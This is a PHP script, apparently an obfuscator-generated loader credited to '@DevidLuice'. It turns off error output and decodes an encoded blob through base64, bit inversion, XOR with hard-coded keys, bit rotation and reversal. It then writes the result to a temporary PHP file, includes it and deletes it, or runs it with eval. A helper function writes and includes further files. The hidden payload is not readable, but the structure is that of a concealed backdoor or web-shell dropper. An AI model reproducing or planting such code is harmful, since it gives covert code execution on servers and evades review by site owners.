<?php
// Generated by @DevidLuice
error_reporting(0);
@ini_set('display_errors', 0);

$kMDiMDNS = array('MKh9RvvdgDrHdrZcaRGPBZE5ZWZy/JkbXD2dJwAYbEZSwo616p7zKYw1xc6A6PT2ykJsTaAG+1PfTo7f', 'aRGPBYkZZffi1vETDL2VH4IqpHY78gYVUZ6zGaQc590gkvwW0nBlZuPluImWNX1XChGXPam6ZWb73Qkb', '1AXHdQrCpA7aq069AK6YGt9Oju1oGsRMgEoG7YBPs8E8BefdIJL8FtJwZWbj5biL3g9XrVDgRsS4Gr4l', 'mL5KUxZvZ0WgKFbkSCgGRdAmk0iWV51vOnLlbOoKZk2q1LI4NVy8dSDoRhx4yIRXCP6KQbykzVei2tVs', 'iPCc7apscePkVVw1+Niu5EhQj1yqLmsptG2tjmBYXhxoKCZNyP4DKf0P51WDK/VXy8MHtAFPctDtfHSe', 'O1i+LtpwbI0oznN5DOSFp4pClyWJAUX34p9KMJ0s51Wzc/1n6xPXjCnPssA9BOdVYkL+LGLSVo2ALiox', 'BLX9fGkRjwUYGAaFOBbRM+VkrJYrQ6UPeytPTNGHKvAVZISmi0PeDIJKDG8INqvxvIUcV7LyxCWJGX1G', 'cvz7yfQV1TVAy/VHQ5sfZDmfYqj1hHzOg9ulD1P7Ny/K9stz1r1lT4JyRJeiwoY14/2YAv/Hr70gOE1H', '88tfJDkXosA9vMym2/tdF6PDhzSq1JNJtl9Ft1r69PY7Mr6FsP2YGsd2P31CeN4Mo8OH1Ak3qjAFtPw1', 'QBrETIDyrlUInkuo9I1NL2kRlz2piGRvCP6jGW19dZ86WDZsgkoMZuP9gDpMH681aGB8JrIa1004Hstr', '1oVFr2qa9JeyKmaNsMZ7YZZf1X9pEY8FiRl9RvvdgDqsba2ngsLeZsByXiWq3kMppB+lLypy3v66Yizs', 'icypAv9OjmRJgKY8iiIsR6qkwVPGZ/cPogquXkDwhB06FBGThL9HXYhq1KyoQpS3CtwZcYyvj524Suz8', 'aFq8RzIcGfNWt1etsCBO7GjIlJ8CNFkr/GX9RYIq9M6yKja9gC57QTxdRX8aKERG+lpGZcIm+8k8Z5/l', 'utp8zoJALMeq1vEC/06OZEkJtz2pAUV+w+W4Av9OjmRJCbc9qQFFfsPluAL/To5kSQm3PakBRX7D5bgC', '/06OZEkJtz2pAUV+w+W4Av9OjmRJCbc9qQFFfsPluAL/To5kSQm3bJE5VH+qNKHbljX9R2rC3WyQUH1G', 'qp7rWcwF7bcy8kRvwAAsfsMuS3kEnMWnWuPeRvpadjWgNtJTxh+2XFhyfGai0kYFCMxLefw1pZdYYkwW', 'sMq2BTg288HspZ9N8MJczmISLHXY/rNQlk/nZEkI3j2pIA4FyNbbSZaFrTVoGLT+umLXbbAm23kM5EUf', 'Glh8ZoLyLAXA/nNTXG3tNQJyRMfAACx+w+TRAv9vzZcqOlwG6vIsreg2oTkEZdV3OsrURlpQBm0JtIFT', 'x3bnZVgJtz2pAUWt6DYpsw==');
$ALIBfVO = '64b585998b411d161921d681f2168fb1';
$YApIsmA = '8e46d88d9866828ee59da95cd210295a';
$JXCvsmcq = 3;


function bqCcTsBMZt($arr) {
    return base64_decode(implode('', $arr));
}

function imDfHiSqg($data, $hexkey) {
    $k = hex2bin($hexkey);
    $out = '';
    $klen = strlen($k);
    $dlen = strlen($data);
    for ($i=0; $i<$dlen; $i++) {
        $out .= chr(ord($data[$i]) ^ ord($k[$i % $klen]));
    }
    return $out;
}

function DIVlHEQGN($data, $n, $dir = 'r') {
    $out = '';
    $dlen = strlen($data);
    for ($i=0; $i<$dlen; $i++) {
        $b = ord($data[$i]) & 0xFF;
        if ($dir === 'r') {
            $b = (($b >> $n) | (($b << (8 - $n)) & 0xFF)) & 0xFF;
        } else {
            $b = ((($b << $n) & 0xFF) | ($b >> (8 - $n))) & 0xFF;
        }
        $out .= chr($b);
    }
    return $out;
}

function brBjlGOxKE($fname, $payload) {
    $tmp = sys_get_temp_dir() . '/' . uniqid('t', true) . '.php';
    if (@file_put_contents($tmp, $payload) !== false) {
        @chmod($tmp, 0640);
        if (@rename($tmp, $fname)) {
            @include_once($fname);
            return true;
        }
    }
    @file_put_contents($fname, $payload);
    @include_once($fname);
    return true;
}

try {
    $enc = bqCcTsBMZt($kMDiMDNS);
    $s = '';
    for ($i=0;$i<strlen($enc);$i++) { $s .= chr((~ord($enc[$i])) & 0xFF); }
    $s = imDfHiSqg($s, $YApIsmA);
    $s = DIVlHEQGN($s, $JXCvsmcq, 'r');
    $s = strrev($s);
    $s = imDfHiSqg($s, $ALIBfVO);

    $tmp = sys_get_temp_dir() . '/' . uniqid('p', true) . '.php';
    if (@file_put_contents($tmp, $s) !== false) {
        @include_once($tmp);
        @unlink($tmp);
        exit;
    }
    @eval($s);
    exit;

} catch (Exception $e) { exit; }
?>